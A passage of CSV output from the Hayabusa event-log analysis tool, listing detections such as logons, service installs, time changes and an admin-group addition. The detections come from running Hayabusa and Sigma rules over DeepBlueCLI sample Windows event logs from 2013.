start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:43.125 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:44.875 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:18:11.000 +00:00,37L4247D28-05,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:18:50.500 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:21:28.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:21:33.630 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:39.911 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:39.973 +00:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-23 16:22:39.973 +00:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:40.004 +00:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-23 16:22:40.004 +00:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:44.979 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:44.979 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:44.979 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:44.979 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:24:00.161 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:27:21.754 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:29:39.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:30:52.625 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:30:56.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:31:10.741 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:32:13.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:33:10.078 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:33:15.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:33:31.593 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:36:53.671 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:36:53.671 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:36:53.671 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:36:53.671 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:45:29.131 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:45:45.037 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:46:48.772 +00:00,IE8Win7,7045,info,Persis,Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:48:35.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:50:25.546 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:50:26.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:50:33.551 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:51:17.207 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:51:17.207 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:51:17.207 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:51:17.207 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:55:52.082 +00:00,IE8Win7,7045,info,Persis,Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:02:24.316 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:03:23.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:04:28.750 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:04:53.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:05:04.098 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:05:33.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:06:18.921 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:06:22.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:07:16.729 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:18:24.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:19:46.750 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:19:51.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:20:01.879 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:21:52.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:23:04.093 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:23:07.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:23:18.798 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:27:14.204 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:27:14.204 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:27:14.204 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:27:14.204 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:34:54.649 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:35:55.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:36:39.718 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:36:43.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:36:53.245 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:38:41.448 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:38:41.448 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:38:41.448 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:38:41.448 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:42:34.667 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:42:56.213 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:44:06.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:45:58.015 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:45:59.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:46:10.368 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:47:07.743 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:47:07.743 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:47:07.743 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:47:07.743 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:54:00.258 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:54:08.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:54:58.140 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:00.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 19:55:06.370 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:29.463 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:29.463 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:29.463 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 19:55:29.463 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:49:57.323 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:52:14.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 20:54:11.078 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:54:22.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 20:54:29.619 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:55:00.775 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:55:00.775 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:55:00.775 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:55:00.775 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 20:56:36.649 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:05:37.180 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:06:17.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 21:07:31.859 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:07:33.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 21:07:44.487 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:13:38.283 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:13:38.283 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:13:38.283 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:13:38.283 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:35:27.028 